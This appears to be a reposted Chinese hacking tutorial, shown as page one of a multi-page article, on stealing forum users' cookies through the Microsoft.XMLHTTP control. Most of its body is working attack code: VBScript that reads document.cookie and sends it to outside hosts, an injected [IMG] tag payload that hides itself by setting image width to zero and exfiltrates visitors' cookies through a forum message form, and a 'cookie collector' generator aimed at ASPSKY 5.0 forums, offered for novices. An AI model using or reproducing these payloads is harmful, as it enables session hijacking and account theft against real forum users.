文章分类 | 推荐文章 | 最新文章 | 热点文章 | 最新软件 | 国产软件 | 国外软件 | 汉化补丁 | 设为首页 | 加入收藏
业界资讯 | 图形图像 | 操作系统 | 网络冲浪 | 工具软件 | 办公软件 | 媒体动画 | 精文荟萃 | 认证考试 | 网站建设 | 技术开发 | 专栏
当前位置:abcdown网络学院网络技术网络安全利用Microsoft.XMLHTTP控件发送COOKIE
精品广告
推荐TOP10
·网吧IP自动修改程序
·Windows权限设置详解
·无线入侵的技术细节
·SQL注入和CSS攻击的检测
·详解:五种Windows常用密码设置
·浅析黑客攻击时的常用方法和攻击步骤
·不怕攻击 家庭上网必学八招安全绝招
·入门者如何获取肉鸡
·Linux安全配置步骤简述
·Wi-Fi网络安全探讨及组网策略
阅读TOP10
·恢复本来面目 消除JPEG图片马赛克
·netcat使用指南
·网吧IP自动修改程序
·Windows权限设置详解
·端口详解(1)-端口分配表
·利用X-scan实现DDoS Ping攻击
·怎样让别人中木马-木马常用骗术大观
·Remote Administrator v2.1 配置文件
·命令行模式改变本地安全策略
·端口详解(2)-端口的分类

利用Microsoft.XMLHTTP控件发送COOKIE

日期:2007年3月10日 作者:清风网络学院 查看:[大字体 中字体 小字体]


//----------------------


另控件的正常用法:
<script language=vbs>
dat=document.cookie
set http=createobject("Microsoft.XMLHTTP")
http.open "POST","http://www.chinansl.com/czy/get.asp?cook="&dat,false
http.send
tt=http.responsetext
msgbox tt
</script>


让代码更完美,现在COOKIE已经乖乖的在我们的邮箱里了,但是有一个小问题由于图片不
能正常的显示会是一个小叉,旁边还有按此在新窗口浏览图片的提示。。。这又难免会让人
生疑。

解决思路:
一个网页中的所有IMG元素通过document.imanges都能例举到,并且可以设置它们的大小,
当width=0时就相当于HIDDEN了.
通过比较元素的src属性的值是否含有"ript"就可以判断是不是我们的图片.
另外比较时大于符用>代替,0用0代替!

代码:
[IMG]vbsCript:execute("for each aa in document.images:if instr(aa.src,""ript"")>0
then:aa.width=0:end if:next")[/IMG]


实际应用的代码:
[IMG]vbsCript:execute("for each aa in document.images:if instr(aa.src,""ript"")>0 then:
aa.width=0:end if:next:dat=replace(document.cookie,""&"",""-""):set http=createobject(""Microsoft.XMLHTTP""):http.open ""GET"",""ht""+""tp://www.hd315.gov.cn/gcs/19qu/yan
qing/bbs/usersms.asp?action=send&touser=czy&title=alll&submit=发送&message=""&dat,false:http.send")[/IMG]


//-------------------方便菜鸟使用:)
<html>
<script language=vbs>
sub changeq()
if form1.loc.value="" or form1.who.value="" then
msgbox "没有加入地址或用户名?"
exit sub
end if
loc=form1.loc.value
user=form1.who.value
str="[IMG]vbsCript:execute("for each aa in document.images:if instr(aa.src,""ript"")>0 then:
aa.width=0:end if:next:dat=replace(document.cookie,""&"",""-""):set http=createobject(""Microsoft.XMLHTTP""):http.open ""GET"",""ht""+""tp://"&loc&"/usersms.asp?action=send&touser="&user&"&title=news&submit=发送&message=""&dat,false:http.send")
[/IMG]"
form1.area.value=str
end sub

</script>
<body>
<FONT SIZE=5 COLOR=RED>ASPSKY 5.0 0320 COOKI搜集器--CZY</FONT>
<form name=form1>
设置发送地址:<input type=text name=loc size=50><br>

上一页 [1] [2] [3] 下一页 

上一篇:IE Object Data Remote Execution Vulnerability

下一篇:网吧十大漏洞曝光


相关软件: 相关文章:
·《二战狙击手:胜利的召唤》全攻略 - 游戏攻略
·C#中利用process类调用外部程序以及执行dos命令
·英杰传3——毛利元就
·镜像文件编辑制作的新利器—ISO Commander
·WEB打印设置解决方案二(利用ScriptX.cab控件改变IE打印设置)
·利用.net反射动态调用指定程序集的中的方法
·利用word将PDF转换DOC文件的方法

特别声明:本站除部分特别声明禁止转载的专稿外的其他文章可以自由转载,但请务必注明出处和原始作者。文章版权归文章原始作者所有。对于被本站转载文章的个人和网站,我们表示深深的谢意。如果本站转载的文章有版权问题请联系编辑人员,我们尽快予以更正。
[打印本页] [关闭窗口] 转载请注明来源:http://www.abcdown.net
首页 | 本站声明 | 下载帮助 | 发布软件 |
中文版权所有:ABC学院 浙ICP备05000717号